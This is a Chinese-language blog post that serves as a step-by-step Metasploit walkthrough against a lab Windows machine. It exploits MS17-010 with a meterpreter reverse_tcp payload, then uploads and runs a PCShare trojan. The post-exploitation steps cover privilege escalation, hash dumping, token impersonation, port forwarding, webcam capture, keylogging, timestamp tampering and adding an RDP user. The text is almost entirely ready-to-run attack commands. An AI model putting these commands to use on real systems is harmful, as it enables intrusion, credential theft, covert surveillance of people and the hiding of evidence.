MSF使用

一、MSF链接目标主机

1.开启MSF控制台:msfconsole

 

 2.搜索模块ms17-010:search ms17-010

 

 3.使用ms17-010模块并显示选项:

使用模块:use ……(可以用模块名,也可以填写模块编号)

显示选项:show options

 

 4.

设置目标主机IP:set RHOSTS 192.168.1.103

 

 设置本地主机IP:set lhosts 192.168.1.108

 

 设置payload(反向tcp链接):set payload windows/x64/meterpreter/reverse_tcp(若不设置payload那么攻击手段将会大大减少,只有shell一种)

 

 攻击:exploit

 

 5.使用shell模式,形同在靶机命令行操作

 

 

 

二、MSF后期攻击方式

1.用pcshare创建客户端,生成一个木马111.exe(IP地址为安装pcshare的物理机IP)

 

 2.将生成的木马文件通过xshell上传到kali

 

 3.将木马文件上传到靶机:upload //root//111.exe c://111.exe(注意:路径为双//)

 

 

 结果:

 

 4.执行木马文件

 

 图形界面操作结果(其中各种操作自行百度吧)

 

 5.下载文件

 

 

6.查看进程ps

 

 7.获取权限:getsystem

 

 8.hash破解:

获取hash值:hashdump

 

 破解hash自行找工具或者网站

9.端口转发(将目标主机端口转发到自己的内网主机端口,访问内网主机端口即可远程控制目标主机)

portfwd add -l 6666 -p 3389 -r 127.0.0.1 #将目标机的3389端口转发到本地6666端口

 

删除端口转发:

portfwd delete -l <portnumber> -p <portnumber> -r <Target IP>

 

 10.查找文件

 

 11.查看权限:getuid

 

 12.查看系统信息sysinfo

 

 13.提权

use incognito

use incognito(列出用户)

impersonate_token "feng-PC\Administrator"

 

 14.摄像头操作(虚拟机没有摄像头,所以命令了解一下就不实操了)

webcam_list    查看摄像头

webcam_snap      通过摄像头拍照

webcam_stream   通过摄像头开启视频

 

 15.修改时间戳: timestomp

 

 

16.远程连接计算机

enable_rdp脚本开启3389

run post/windows/manage/enable_rdp  #开启远程桌面

run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456 #添加用户

run post/windows/manage/enable_rdp FORWARD=true LPORT=6662  #将3389端口转发到6662

 

 17.键盘记录

keyscan_start  #开始键盘记录

keyscan_dump   #导出记录数据

keyscan_stop #结束键盘记录

 

 

 

 

 

posted @ 2020-03-10 22:37  终末少女的旅行  阅读(1165)  评论(0)    收藏  举报